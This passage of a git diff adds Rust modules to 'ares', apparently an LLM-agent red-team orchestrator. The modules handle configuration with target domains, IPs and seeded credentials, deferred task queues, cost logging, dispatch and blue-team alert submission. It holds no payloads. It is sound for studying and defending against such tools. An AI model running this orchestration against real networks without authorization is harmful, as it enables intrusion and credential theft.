now.to_rfc3339(), + "techniques_used": &techniques[..std::cmp::min(techniques.len(), 20)], + "deployment": target_env, + }); + + let alert = serde_json::json!({ + "labels": { + "alertname": format!("RedTeamOperation_{}", op_id), + "severity": "critical", + "source": "ares-red-team", + "deployment": target_env, + }, + "annotations": { + "summary": format!( + "Red team operation {op_id} - {cred_count} credentials, {host_count} hosts, {vuln_count} vulnerabilities", + ), + "description": format!( + "Investigate blue team detection coverage for red team operation {op_id}. \ + Domain: {target_domain}. 
Domain admin: {has_da}.", + ), + }, + "operation_context": operation_context, + "startsAt": now.to_rfc3339(), + "endsAt": now.to_rfc3339(), + "target_ips": &target_ips[..std::cmp::min(target_ips.len(), 50)], + }); + + // Resolve model from env (same precedence as CLI) + let model = std::env::var("ARES_BLUE_LLM_MODEL") + .ok() + .filter(|s| !s.is_empty()) + .or_else(|| std::env::var("ARES_MODEL_OVERRIDE").ok()) + .or_else(|| std::env::var("ARES_ORCHESTRATOR_MODEL").ok()) + .or_else(|| std::env::var("ARES_MODEL").ok()); + + let grafana_url = std::env::var("GRAFANA_URL").ok(); + let grafana_api_key = std::env::var("GRAFANA_SERVICE_ACCOUNT_TOKEN").ok(); + + let max_steps: u32 = std::env::var("ARES_BLUE_MAX_STEPS") + .ok() + .and_then(|s| s.parse().ok()) + .unwrap_or(75); + + let request = serde_json::json!({ + "investigation_id": inv_id, + "alert": alert, + "correlation_context": null, + "model": model, + "max_steps": max_steps, + "multi_agent": true, + "auto_route": false, + "report_dir": null, + "grafana_url": grafana_url, + "grafana_api_key": grafana_api_key, + "submitted_at": now.to_rfc3339(), + }); + + // Store env vars for the blue runner (Grafana token, API keys) + let env_vars: std::collections::HashMap = [ + "ANTHROPIC_API_KEY", + "OPENAI_API_KEY", + "GRAFANA_SERVICE_ACCOUNT_TOKEN", + "GRAFANA_URL", + ] + .iter() + .filter_map(|&key| std::env::var(key).ok().map(|v| (key.to_string(), v))) + .collect(); + + if !env_vars.is_empty() { + let env_vars_key = format!("ares:blue:inv:{inv_id}:env_vars"); + let env_json = serde_json::to_string(&env_vars)?; + let _: () = conn.set(&env_vars_key, &env_json).await?; + let _: () = conn.expire(&env_vars_key, 3600).await?; + } + + // Pre-register as active BEFORE pushing to queue to avoid TOCTOU race: + // without this, the completion wait loop can observe both queued==0 and + // active==0 in the window between the blue orchestrator's BRPOP (drains + // the queue) and its register_investigation (SADDs to active set). + let _: () = conn + .sadd(ares_core::state::BLUE_ACTIVE_INVESTIGATIONS, &inv_id) + .await?; + let _: () = conn + .expire(ares_core::state::BLUE_ACTIVE_INVESTIGATIONS, 86400) + .await?; + + // Push investigation request to queue + let request_json = serde_json::to_string(&request)?; + let _: () = conn + .rpush("ares:blue:investigations", &request_json) + .await?; + + // Track investigation against operation + let op_inv_key = format!("ares:blue:op:{op_id}:investigations"); + let _: () = conn.sadd(&op_inv_key, &inv_id).await?; + let _: () = conn.expire(&op_inv_key, 7 * 24 * 3600).await?; + + info!( + investigation_id = inv_id, + operation_id = op_id, + "Auto-submitted blue investigation from operation state" + ); + + Ok(()) +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_forest_root_of_simple() { + assert_eq!(forest_root_of("contoso.local"), "contoso.local"); + } + + #[test] + fn test_forest_root_of_child() { + assert_eq!(forest_root_of("north.contoso.local"), "contoso.local"); + } + + #[test] + fn test_forest_root_of_deep_child() { + assert_eq!(forest_root_of("sub.north.contoso.local"), "contoso.local"); + } +} diff --git a/ares-cli/src/orchestrator/config.rs b/ares-cli/src/orchestrator/config.rs new file mode 100644 index 00000000..fcaefb39 --- /dev/null +++ b/ares-cli/src/orchestrator/config.rs @@ -0,0 +1,365 @@ +//! Configuration loaded from environment variables. +//! +//! Mirrors the Python `ares.core.config` module. Every knob exposed to the +//! 
Python orchestrator is also configurable here so the Rust binary is a
+//! drop-in replacement.
+
+use std::env;
+use std::time::Duration;
+
+/// All tunables for the orchestrator, loaded once at startup.
+#[derive(Debug, Clone)]
+#[allow(dead_code)]
+pub struct OrchestratorConfig {
+    /// Redis connection URL (supports `redis://` and `redis+sentinel://`).
+    pub redis_url: String,
+
+    /// Operation ID this orchestrator instance manages.
+    pub operation_id: String,
+
+    /// Maximum number of concurrent LLM-consuming tasks across all roles.
+    pub max_concurrent_tasks: usize,
+
+    /// Interval between heartbeat sweeps.
+    pub heartbeat_interval: Duration,
+
+    /// How long before an agent with no heartbeat is considered dead.
+    pub heartbeat_timeout: Duration,
+
+    /// How often the result consumer polls Redis for completed tasks.
+    pub result_poll_interval: Duration,
+
+    /// TTL for the operation lock key (`ares:lock:{op_id}`).
+    pub lock_ttl: Duration,
+
+    /// How often the deferred-queue processor wakes up.
+    pub deferred_poll_interval: Duration,
+
+    /// Maximum number of tasks a single role can have in-flight.
+    pub max_tasks_per_role: usize,
+
+    /// Global rate-limit: minimum delay between consecutive task dispatches.
+    pub dispatch_delay: Duration,
+
+    /// How long before an in-progress task with no activity is considered stale.
+    pub stale_task_timeout: Duration,
+
+    /// Maximum age for deferred tasks before eviction (seconds).
+    pub deferred_task_max_age: Duration,
+
+    /// Maximum number of deferred tasks per task type.
+    pub max_deferred_per_type: usize,
+
+    /// Maximum total deferred tasks across all types.
+    pub max_deferred_total: usize,
+
+    /// Target domain for the operation (e.g. "contoso.local").
+    pub target_domain: String,
+
+    /// Target IPs for the operation (comma-separated in env, parsed to vec).
+    pub target_ips: Vec<String>,
+
+    /// Initial credential to seed at startup (optional).
+    /// Format: `user:pass@domain` or from JSON payload.
+    pub initial_credential: Option<InitialCredential>,
+}
+
+/// A credential provided at operation launch time.
+#[derive(Debug, Clone)]
+pub struct InitialCredential {
+    pub username: String,
+    pub password: String,
+    pub domain: String,
+}
+
+impl OrchestratorConfig {
+    /// Load configuration from environment variables with sensible defaults.
+    pub fn from_env() -> anyhow::Result<Self> {
+        let redis_url =
+            env::var("ARES_REDIS_URL").unwrap_or_else(|_| "redis://127.0.0.1:6379/0".to_string());
+
+        let raw_op = env::var("ARES_OPERATION_ID")
+            .map_err(|_| anyhow::anyhow!("ARES_OPERATION_ID is required"))?;
+
+        // ARES_OPERATION_ID may be a plain operation-id string OR a full JSON
+        // payload (the queue dispatcher passes the entire operation request JSON).
+        let (operation_id, target_domain, target_ips, json_cred) = if raw_op.starts_with('{') {
+            let v: serde_json::Value = serde_json::from_str(&raw_op)
+                .map_err(|e| anyhow::anyhow!("Failed to parse ARES_OPERATION_ID JSON: {e}"))?;
+            let op_id = v["operation_id"]
+                .as_str()
+                .ok_or_else(|| anyhow::anyhow!("Missing operation_id in JSON payload"))?
+                .to_string();
+            let domain = v["target_domain"].as_str().unwrap_or("").to_string();
+            let ips: Vec<String> = v["target_ips"]
+                .as_array()
+                .map(|arr| {
+                    arr.iter()
+                        .filter_map(|v| v.as_str().map(|s| s.to_string()))
+                        .collect()
+                })
+                .unwrap_or_default();
+            // Extract initial credential from JSON payload.
+ // Python sends a nested object: {"initial_credential": {"username": ..., "password": ..., "domain": ...}} + // Also support flat fields for backwards compatibility: {"initial_username": ..., "initial_password": ...} + let cred = if let Some(ic) = v.get("initial_credential").and_then(|v| v.as_object()) { + match ( + ic.get("username").and_then(|v| v.as_str()), + ic.get("password").and_then(|v| v.as_str()), + ) { + (Some(user), Some(pass)) => Some(InitialCredential { + username: user.to_string(), + password: pass.to_string(), + domain: ic + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or(&domain) + .to_string(), + }), + _ => None, + } + } else { + // Flat field fallback + match ( + v["initial_username"].as_str(), + v["initial_password"].as_str(), + ) { + (Some(user), Some(pass)) => Some(InitialCredential { + username: user.to_string(), + password: pass.to_string(), + domain: v["initial_domain"].as_str().unwrap_or(&domain).to_string(), + }), + _ => None, + } + }; + (op_id, domain, ips, cred) + } else { + // Plain operation ID — read target info from separate env vars + let domain = env::var("ARES_TARGET_DOMAIN").unwrap_or_default(); + let ips: Vec = env::var("ARES_TARGET_IPS") + .unwrap_or_default() + .split(',') + .map(|s| s.trim().to_string()) + .filter(|s| !s.is_empty()) + .collect(); + (raw_op, domain, ips, None) + }; + + // Initial credential: JSON payload takes precedence, then env var. + // Format: user:pass@domain + let initial_credential = json_cred.or_else(|| { + env::var("ARES_INITIAL_CREDENTIAL") + .ok() + .and_then(|raw| parse_credential_spec(&raw, &target_domain)) + }); + + let max_concurrent_tasks = parse_env("ARES_MAX_CONCURRENT_TASKS", 8); + let heartbeat_interval_secs = parse_env("ARES_HEARTBEAT_INTERVAL_SECS", 30); + let heartbeat_timeout_secs = parse_env("ARES_HEARTBEAT_TIMEOUT_SECS", 120); + let result_poll_interval_ms = parse_env("ARES_RESULT_POLL_INTERVAL_MS", 500); + let lock_ttl_secs = parse_env("ARES_LOCK_TTL_SECS", 300); + let deferred_poll_interval_secs = parse_env("ARES_DEFERRED_POLL_INTERVAL_SECS", 10); + let max_tasks_per_role = parse_env("ARES_MAX_TASKS_PER_ROLE", 3); + let dispatch_delay_ms = parse_env("ARES_DISPATCH_DELAY_MS", 200); + let stale_task_timeout_secs = parse_env("ARES_STALE_TASK_TIMEOUT_SECS", 900); + let deferred_task_max_age_secs = parse_env("ARES_DEFERRED_TASK_MAX_AGE_SECS", 300); + let max_deferred_per_type = parse_env("ARES_MAX_DEFERRED_PER_TYPE", 50); + let max_deferred_total = parse_env("ARES_MAX_DEFERRED_TOTAL", 200); + + Ok(Self { + redis_url, + operation_id, + max_concurrent_tasks, + heartbeat_interval: Duration::from_secs(heartbeat_interval_secs), + heartbeat_timeout: Duration::from_secs(heartbeat_timeout_secs), + result_poll_interval: Duration::from_millis(result_poll_interval_ms), + lock_ttl: Duration::from_secs(lock_ttl_secs), + deferred_poll_interval: Duration::from_secs(deferred_poll_interval_secs), + max_tasks_per_role, + dispatch_delay: Duration::from_millis(dispatch_delay_ms), + stale_task_timeout: Duration::from_secs(stale_task_timeout_secs), + deferred_task_max_age: Duration::from_secs(deferred_task_max_age_secs), + max_deferred_per_type, + max_deferred_total, + target_domain, + target_ips, + initial_credential, + }) + } + + /// Hard cap = 1.5x the soft concurrency limit. Tasks above this are deferred. + pub fn hard_cap(&self) -> usize { + (self.max_concurrent_tasks as f64 * 1.5) as usize + } +} + +/// Parse a credential spec in `user:pass@domain` format. 
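+/// For example, a hypothetical spec `svc_sql:S3cret!@contoso.local` parses to
+/// username `svc_sql`, password `S3cret!`, domain `contoso.local`.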
+/// If no `@domain` is given, falls back to `default_domain`.
+///
+/// The `@` that separates password from domain must look like a domain
+/// (contains a dot). This avoids misinterpreting `@` characters within
+/// passwords (e.g., `admin:P@ssw0rd` stays intact).
+fn parse_credential_spec(spec: &str, default_domain: &str) -> Option<InitialCredential> {
+    let colon_pos = spec.find(':')?;
+    let username = &spec[..colon_pos];
+    let rest = &spec[colon_pos + 1..]; // password[@domain]
+
+    // Only treat text after the last '@' as a domain if it contains a dot,
+    // to avoid misinterpreting '@' in passwords (e.g. P@ssw0rd).
+    let (password, domain) = if let Some(at_pos) = rest.rfind('@') {
+        let candidate = &rest[at_pos + 1..];
+        if candidate.contains('.') {
+            (&rest[..at_pos], candidate)
+        } else {
+            (rest, default_domain)
+        }
+    } else {
+        (rest, default_domain)
+    };
+
+    if username.is_empty() || password.is_empty() {
+        return None;
+    }
+    Some(InitialCredential {
+        username: username.to_string(),
+        password: password.to_string(),
+        domain: domain.to_string(),
+    })
+}
+
+/// Parse an environment variable into a `FromStr` type, falling back to `default`.
+fn parse_env<T: std::str::FromStr>(key: &str, default: T) -> T {
+    env::var(key)
+        .ok()
+        .and_then(|v| v.parse().ok())
+        .unwrap_or(default)
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    /// Helper to create a config without env vars.
+    pub(crate) fn make_config(max_tasks: usize) -> OrchestratorConfig {
+        OrchestratorConfig {
+            redis_url: "redis://localhost".into(),
+            operation_id: "test-op".into(),
+            max_concurrent_tasks: max_tasks,
+            heartbeat_interval: Duration::from_secs(30),
+            heartbeat_timeout: Duration::from_secs(120),
+            result_poll_interval: Duration::from_millis(500),
+            lock_ttl: Duration::from_secs(300),
+            deferred_poll_interval: Duration::from_secs(10),
+            max_tasks_per_role: 3,
+            dispatch_delay: Duration::from_millis(0),
+            stale_task_timeout: Duration::from_secs(900),
+            deferred_task_max_age: Duration::from_secs(300),
+            max_deferred_per_type: 50,
+            max_deferred_total: 200,
+            target_domain: String::new(),
+            target_ips: Vec::new(),
+            initial_credential: None,
+        }
+    }
+
+    #[test]
+    fn hard_cap_is_1_5x() {
+        assert_eq!(make_config(8).hard_cap(), 12);
+        assert_eq!(make_config(10).hard_cap(), 15);
+        assert_eq!(make_config(1).hard_cap(), 1);
+    }
+
+    #[test]
+    fn from_env_plain_and_json_and_missing() {
+        // Single test to avoid env var race conditions between parallel tests.
+ std::env::remove_var("ARES_INITIAL_CREDENTIAL"); + + // Missing → error + std::env::remove_var("ARES_OPERATION_ID"); + assert!(OrchestratorConfig::from_env().is_err()); + + // Plain string → operation_id, empty targets + std::env::set_var("ARES_OPERATION_ID", "test-op-1"); + let c = OrchestratorConfig::from_env().unwrap(); + assert_eq!(c.operation_id, "test-op-1"); + assert_eq!(c.max_concurrent_tasks, 8); + assert_eq!(c.heartbeat_interval, Duration::from_secs(30)); + assert!(c.target_ips.is_empty()); + assert!(c.initial_credential.is_none()); + + // JSON payload → parsed operation_id, target_domain, target_ips + let payload = r#"{"operation_id":"op-json-test","target_domain":"contoso.local","target_ips":["192.168.58.1","192.168.58.2"],"model":"gpt-4"}"#; + std::env::set_var("ARES_OPERATION_ID", payload); + let c = OrchestratorConfig::from_env().unwrap(); + assert_eq!(c.operation_id, "op-json-test"); + assert_eq!(c.target_domain, "contoso.local"); + assert_eq!(c.target_ips, vec!["192.168.58.1", "192.168.58.2"]); + + // JSON payload with nested initial_credential (Python format) + let payload = r#"{"operation_id":"op-cred","target_domain":"contoso.local","target_ips":[],"initial_credential":{"username":"admin","password":"Pass123","domain":"contoso.local"}}"#; + std::env::set_var("ARES_OPERATION_ID", payload); + let c = OrchestratorConfig::from_env().unwrap(); + let cred = c.initial_credential.unwrap(); + assert_eq!(cred.username, "admin"); + assert_eq!(cred.password, "Pass123"); + assert_eq!(cred.domain, "contoso.local"); + + // JSON payload with flat initial credential (backwards compat) + let payload = r#"{"operation_id":"op-cred2","target_domain":"contoso.local","target_ips":[],"initial_username":"admin2","initial_password":"Pass456"}"#; + std::env::set_var("ARES_OPERATION_ID", payload); + let c = OrchestratorConfig::from_env().unwrap(); + let cred = c.initial_credential.unwrap(); + assert_eq!(cred.username, "admin2"); + assert_eq!(cred.password, "Pass456"); + assert_eq!(cred.domain, "contoso.local"); + + // Env var credential (ARES_INITIAL_CREDENTIAL) + std::env::set_var("ARES_OPERATION_ID", "test-op-2"); + std::env::set_var("ARES_INITIAL_CREDENTIAL", "user1:secret@fabrikam.local"); + let c = OrchestratorConfig::from_env().unwrap(); + let cred = c.initial_credential.unwrap(); + assert_eq!(cred.username, "user1"); + assert_eq!(cred.password, "secret"); + assert_eq!(cred.domain, "fabrikam.local"); + + std::env::remove_var("ARES_OPERATION_ID"); + std::env::remove_var("ARES_INITIAL_CREDENTIAL"); + } + + #[test] + fn parse_credential_spec_full() { + let cred = parse_credential_spec("admin:P@ssw0rd@contoso.local", "").unwrap(); + assert_eq!(cred.username, "admin"); + assert_eq!(cred.password, "P@ssw0rd"); + assert_eq!(cred.domain, "contoso.local"); + } + + #[test] + fn parse_credential_spec_no_domain() { + let cred = parse_credential_spec("admin:P@ssw0rd", "fallback.local").unwrap(); + assert_eq!(cred.username, "admin"); + assert_eq!(cred.password, "P@ssw0rd"); + assert_eq!(cred.domain, "fallback.local"); + } + + #[test] + fn parse_credential_spec_at_in_password() { + // rfind('@') splits at the last @, so user:p@ss@domain works + let cred = parse_credential_spec("admin:p@ss@contoso.local", "").unwrap(); + assert_eq!(cred.username, "admin"); + assert_eq!(cred.password, "p@ss"); + assert_eq!(cred.domain, "contoso.local"); + } + + #[test] + fn parse_credential_spec_invalid() { + // No colon + assert!(parse_credential_spec("admin", "").is_none()); + // Empty username + 
assert!(parse_credential_spec(":pass@contoso.local", "").is_none()); + // Empty password + assert!(parse_credential_spec("admin:@contoso.local", "").is_none()); + // Empty password without domain + assert!(parse_credential_spec("admin:", "").is_none()); + } +} diff --git a/ares-cli/src/orchestrator/cost_summary.rs b/ares-cli/src/orchestrator/cost_summary.rs new file mode 100644 index 00000000..ff4b4a8f --- /dev/null +++ b/ares-cli/src/orchestrator/cost_summary.rs @@ -0,0 +1,87 @@ +//! Periodic token usage and cost summary. +//! +//! Spawns a background task that logs aggregate token usage and estimated cost +//! every 120 seconds, matching Python's `_periodic_token_usage_summary()`. + +use std::sync::Arc; +use std::time::Duration; + +use tokio::sync::watch; +use tokio::task::JoinHandle; +use tracing::{debug, info}; + +use ares_core::token_usage::{estimate_usage_cost, get_token_usage}; + +use crate::orchestrator::config::OrchestratorConfig; +use crate::orchestrator::task_queue::TaskQueue; + +/// How often to log the cost summary. +const SUMMARY_INTERVAL: Duration = Duration::from_secs(120); + +/// Spawn the periodic cost summary background task. +pub fn spawn_cost_summary( + queue: TaskQueue, + config: Arc, + shutdown_rx: watch::Receiver, +) -> JoinHandle<()> { + tokio::spawn(cost_summary_loop(queue, config, shutdown_rx)) +} + +async fn cost_summary_loop( + queue: TaskQueue, + config: Arc, + mut shutdown_rx: watch::Receiver, +) { + let mut interval = tokio::time::interval(SUMMARY_INTERVAL); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + // Skip the first immediate tick + interval.tick().await; + + loop { + tokio::select! { + _ = interval.tick() => {} + _ = shutdown_rx.changed() => { + debug!("Cost summary: shutdown"); + return; + } + } + + if *shutdown_rx.borrow() { + return; + } + + let mut conn = queue.connection(); + match get_token_usage(&mut conn, &config.operation_id).await { + Ok(Some(usage)) => { + let in_tok = usage.input_tokens; + let out_tok = usage.output_tokens; + if in_tok == 0 && out_tok == 0 { + continue; + } + let total = in_tok + out_tok; + + let (total_cost, breakdown, _unpriced) = estimate_usage_cost(&usage); + + let cost_str = match total_cost { + Some(cost) => { + let suffix = if breakdown.len() > 1 { " blended" } else { "" }; + format!(" | ${cost:.4}{suffix}") + } + None if !usage.models.is_empty() => { + let n = usage.models.len(); + let label = if n > 1 { "models" } else { "model" }; + format!(" | cost unavailable for {n} {label}") + } + _ => String::new(), + }; + + info!("💰 [token-usage] {total} tokens (in: {in_tok} out: {out_tok}){cost_str}"); + } + Ok(None) => {} + Err(e) => { + debug!("Token usage summary failed: {e}"); + } + } + } +} diff --git a/ares-cli/src/orchestrator/deferred.rs b/ares-cli/src/orchestrator/deferred.rs new file mode 100644 index 00000000..168e6e6b --- /dev/null +++ b/ares-cli/src/orchestrator/deferred.rs @@ -0,0 +1,395 @@ +//! Redis-backed deferred task queue. +//! +//! When the throttler decides to defer a task, it lands here in a ZSET keyed +//! by `ares:deferred:{operation_id}:{task_type}`. A background tokio task +//! periodically checks for tasks whose score (priority-weighted timestamp) +//! qualifies them for re-dispatch once concurrency slots open up. +//! +//! Score formula: `(priority * 1_000_000_000) + (unix_millis)` +//! Lower score = higher priority = processed first. 
+ +use anyhow::{Context, Result}; +use chrono::Utc; +use redis::AsyncCommands; +use serde::{Deserialize, Serialize}; +use std::sync::Arc; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::config::OrchestratorConfig; +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::task_queue::TaskQueue; +use crate::orchestrator::throttling::{ThrottleDecision, Throttler}; + +/// Redis key prefix for deferred queues (matches Python `DEFERRED_QUEUE_PREFIX`). +pub const DEFERRED_QUEUE_PREFIX: &str = "ares:deferred"; + +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct DeferredTask { + pub priority: i32, + pub enqueue_time: f64, + pub task_type: String, + pub target_role: String, + pub payload: serde_json::Value, + pub source_agent: String, +} + +impl DeferredTask { + /// ZSET score: priority bucket * 1e9 + enqueue millis. + pub fn score(&self) -> f64 { + (self.priority as f64) * 1_000_000_000.0 + self.enqueue_time * 1000.0 + } +} + +/// Manages the Redis ZSET-backed deferred queue. +pub struct DeferredQueue { + queue: TaskQueue, + config: Arc<OrchestratorConfig>, +} + +impl DeferredQueue { + pub fn new(queue: TaskQueue, config: Arc<OrchestratorConfig>) -> Self { + Self { queue, config } + } + + /// Redis key for the per-task-type deferred ZSET. + fn zset_key(&self, task_type: &str) -> String { + format!( + "{}:{}:{}", + DEFERRED_QUEUE_PREFIX, self.config.operation_id, task_type + ) + } + + /// Enqueue a task for later dispatch. + /// + /// Returns `true` if the task was accepted, `false` if the queue is full. + pub async fn enqueue(&self, task: &DeferredTask) -> Result<bool> { + let key = self.zset_key(&task.task_type); + + // Check per-type limit + let mut conn = self.queue_conn(); + let current_len: usize = conn.zcard(&key).await.unwrap_or(0); + if current_len >= self.config.max_deferred_per_type { + debug!( + task_type = %task.task_type, + len = current_len, + max = self.config.max_deferred_per_type, + "Deferred queue full for type" + ); + return Ok(false); + } + + let json = serde_json::to_string(task).context("Failed to serialize DeferredTask")?; + let score = task.score(); + + conn.zadd::<_, _, _, ()>(&key, &json, score) + .await + .with_context(|| format!("ZADD to {key}"))?; + + info!( + task_type = %task.task_type, + role = %task.target_role, + priority = task.priority, + score, + "Task deferred" + ); + Ok(true) + } + + /// Pop the highest-priority (lowest-score) task from any type ZSET. + /// + /// Scans all known task-type keys for this operation and picks the + /// globally lowest score.
+ pub async fn pop_best(&self) -> Result<Option<DeferredTask>> { + let pattern = format!("{}:{}:*", DEFERRED_QUEUE_PREFIX, self.config.operation_id); + let mut conn = self.queue_conn(); + + // SCAN for matching keys (avoids blocking Redis with KEYS) + let keys: Vec<String> = scan_keys_async(&mut conn, &pattern).await; + + if keys.is_empty() { + return Ok(None); + } + + // Find the globally best candidate across all type ZSETs + let mut best: Option<(String, String, f64)> = None; // (key, member, score) + + for key in &keys { + // Peek at the lowest-score member + let members: Vec<(String, f64)> = redis::cmd("ZRANGEBYSCORE") + .arg(key) + .arg("-inf") + .arg("+inf") + .arg("WITHSCORES") + .arg("LIMIT") + .arg(0) + .arg(1) + .query_async(&mut conn) + .await + .unwrap_or_default(); + + if let Some((member, score)) = members.into_iter().next() { + let is_better = best.as_ref().map(|(_, _, s)| score < *s).unwrap_or(true); + if is_better { + best = Some((key.clone(), member, score)); + } + } + } + + match best { + Some((key, member, _score)) => { + // Remove it; ZREM is atomic, so if a concurrent consumer won the + // race `removed` is 0 and we simply report an empty pop. + let removed: usize = conn.zrem(&key, &member).await.unwrap_or(0); + if removed == 0 { + // Someone else grabbed it (unlikely in single-orchestrator mode) + return Ok(None); + } + let task: DeferredTask = + serde_json::from_str(&member).context("Bad DeferredTask JSON")?; + Ok(Some(task)) + } + None => Ok(None), + } + } + + /// Evict tasks older than `max_age` from all deferred ZSETs. + pub async fn evict_stale(&self) -> Result<usize> { + let pattern = format!("{}:{}:*", DEFERRED_QUEUE_PREFIX, self.config.operation_id); + let mut conn = self.queue_conn(); + let keys: Vec<String> = scan_keys_async(&mut conn, &pattern).await; + + let max_age = self.config.deferred_task_max_age; + let cutoff = Utc::now().timestamp() as f64 - max_age.as_secs_f64(); + let mut total_evicted = 0_usize; + + for key in &keys { + // All members, check enqueue_time + let members: Vec<(String, f64)> = redis::cmd("ZRANGEBYSCORE") + .arg(key) + .arg("-inf") + .arg("+inf") + .arg("WITHSCORES") + .query_async(&mut conn) + .await + .unwrap_or_default(); + + for (member, _score) in members { + if let Ok(task) = serde_json::from_str::<DeferredTask>(&member) { + if task.enqueue_time < cutoff { + let _: usize = conn.zrem(key, &member).await.unwrap_or(0); + total_evicted += 1; + debug!( + task_type = %task.task_type, + age_secs = Utc::now().timestamp() as f64 - task.enqueue_time, + "Evicted stale deferred task" + ); + } + } + } + } + + if total_evicted > 0 { + info!(evicted = total_evicted, "Deferred queue stale eviction"); + } + Ok(total_evicted) + } + + fn queue_conn(&self) -> redis::aio::ConnectionManager { + // TaskQueue wraps a ConnectionManager, which implements Clone cheaply. + // We access it through an internal method. + self.queue.connection() + } +} + +/// Scan Redis keys matching a pattern using cursor iteration (avoids KEYS). +async fn scan_keys_async(conn: &mut redis::aio::ConnectionManager, pattern: &str) -> Vec<String> { + let mut all_keys = Vec::new(); + let mut cursor: u64 = 0; + loop { + let result: Result<(u64, Vec<String>), _> = redis::cmd("SCAN") + .arg(cursor) + .arg("MATCH") + .arg(pattern) + .arg("COUNT") + .arg(100) + .query_async(conn) + .await; + match result { + Ok((next_cursor, keys)) => { + all_keys.extend(keys); + cursor = next_cursor; + if cursor == 0 { + break; + } + } + Err(_) => break, + } + } + all_keys +} + +/// Spawn a tokio task that periodically drains the deferred queue whenever +/// the throttler allows new submissions.
+/// +/// Uses `Dispatcher::do_submit()` to route tasks directly to the LLM agent +/// loop (not Redis task queues, which have no consumer in this process). +pub fn spawn_deferred_processor( + deferred: Arc<DeferredQueue>, + dispatcher: Arc<Dispatcher>, + throttler: Arc<Throttler>, + config: Arc<OrchestratorConfig>, + mut shutdown: watch::Receiver<bool>, +) -> tokio::task::JoinHandle<()> { + tokio::spawn(async move { + let mut interval = tokio::time::interval(config.deferred_poll_interval); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => { + info!("Deferred processor shutting down"); + break; + } + } + + // Evict stale tasks first + if let Err(e) = deferred.evict_stale().await { + warn!(err = %e, "Deferred eviction error"); + } + + // Try to drain as many as possible while slots are open + let mut dispatched = 0_u32; + loop { + let Some(task) = (match deferred.pop_best().await { + Ok(t) => t, + Err(e) => { + warn!(err = %e, "pop_best error"); + break; + } + }) else { + break; // queue empty + }; + + // Re-check throttle before submitting + let decision = throttler + .check(&task.task_type, &task.target_role, Some(&task.payload)) + .await; + + match decision { + ThrottleDecision::Allow => { + // Pre-check credential concurrency to avoid a hot + // re-enqueue loop: submit_to_llm would re-defer the + // task if the credential is at capacity, but this + // drain loop would immediately pop it again. + if let Some(cred_key) = + crate::orchestrator::dispatcher::credential_key_from_payload( + &task.payload, + ) + { + if !dispatcher.credential_inflight.can_acquire(&cred_key).await { + let _ = deferred.enqueue(&task).await; + break; + } + } + + // Route directly to the LLM agent loop via Dispatcher. + // do_submit handles tracker.add() and throttler.record_dispatch(). + match dispatcher + .do_submit( + &task.task_type, + &task.target_role, + task.payload.clone(), + task.priority, + ) + .await + { + Ok(Some(tid)) => { + dispatched += 1; + info!( + task_id = %tid, + task_type = %task.task_type, + "Deferred task dispatched" + ); + } + Ok(None) => { + // Credential concurrency block or no role mapping. + // Task may have been re-enqueued by submit_to_llm; + // break to avoid hot loop. + break; + } + Err(e) => { + warn!(err = %e, "Failed to dispatch deferred task"); + // Re-enqueue so it is not lost + let _ = deferred.enqueue(&task).await; + break; + } + } + } + ThrottleDecision::Defer | ThrottleDecision::Wait(_) => { + // Put it back; stop draining since capacity is full.
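+ // Note: enqueue() re-checks the per-type cap, so if the queue + // filled up in the meantime the task is dropped rather than re-queued.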
+ let _ = deferred.enqueue(&task).await; + break; + } + } + } + + if dispatched > 0 { + info!(dispatched, "Deferred queue drain cycle"); + } + } + }) +} + +#[cfg(test)] +mod tests { + use super::*; + + fn make_task(priority: i32, enqueue_time: f64) -> DeferredTask { + DeferredTask { + priority, + enqueue_time, + task_type: "recon".into(), + target_role: "recon".into(), + payload: serde_json::json!({}), + source_agent: "orchestrator".into(), + } + } + + #[test] + fn higher_priority_lower_score() { + let high = make_task(1, 1000.0); + let low = make_task(5, 1000.0); + assert!(high.score() < low.score()); + } + + #[test] + fn same_priority_fifo_ordering() { + let earlier = make_task(5, 1000.0); + let later = make_task(5, 1010.0); + assert!(earlier.score() < later.score()); + } + + #[test] + fn score_deterministic() { + let t = make_task(3, 1700000000.0); + assert_eq!(t.score(), t.score()); + } + + #[test] + fn priority_dominates_time_within_bucket() { + // With small time deltas (< 1s apart), priority bucket dominates + let p1_late = make_task(1, 100.010); + let p5_early = make_task(5, 100.000); + assert!(p1_late.score() < p5_early.score()); + } + + #[test] + fn deferred_task_roundtrip() { + let t = make_task(3, 1700000000.0); + let json = serde_json::to_string(&t).unwrap(); + let t2: DeferredTask = serde_json::from_str(&json).unwrap(); + assert_eq!(t.priority, t2.priority); + assert_eq!(t.task_type, t2.task_type); + assert!((t.enqueue_time - t2.enqueue_time).abs() < f64::EPSILON); + } +} diff --git a/ares-cli/src/orchestrator/dispatcher/mod.rs b/ares-cli/src/orchestrator/dispatcher/mod.rs new file mode 100644 index 00000000..baee2430 --- /dev/null +++ b/ares-cli/src/orchestrator/dispatcher/mod.rs @@ -0,0 +1,132 @@ +//! Central dispatcher — ties together task submission, throttling, and state. +//! +//! All task submission goes through `Dispatcher::throttled_submit()` which checks +//! the throttler, submits or defers, and tracks active tasks. Convenience methods +//! like `request_crack()`, `request_recon()` etc. build the correct payloads. + +mod submission; +mod task_builders; + +use std::collections::HashMap; +use std::sync::Arc; +use tokio::sync::{Mutex, Notify}; + +use crate::orchestrator::config::OrchestratorConfig; +use crate::orchestrator::deferred::DeferredQueue; +use crate::orchestrator::llm_runner::LlmTaskRunner; +use crate::orchestrator::routing::ActiveTaskTracker; +use crate::orchestrator::state::SharedState; +use crate::orchestrator::task_queue::TaskQueue; +use crate::orchestrator::throttling::Throttler; + +// --------------------------------------------------------------------------- +// Per-credential in-flight limiter +// --------------------------------------------------------------------------- + +/// Limits how many concurrent LLM agent loops may be in-flight for the same +/// credential. Prevents thundering-herd when only one credential has been +/// discovered and both automation loops try to spawn many tasks with it. +#[derive(Clone)] +pub struct CredentialInflight { + inner: Arc<Mutex<HashMap<String, usize>>>, + max_per_credential: usize, +} + +impl CredentialInflight { + pub fn new(max_per_credential: 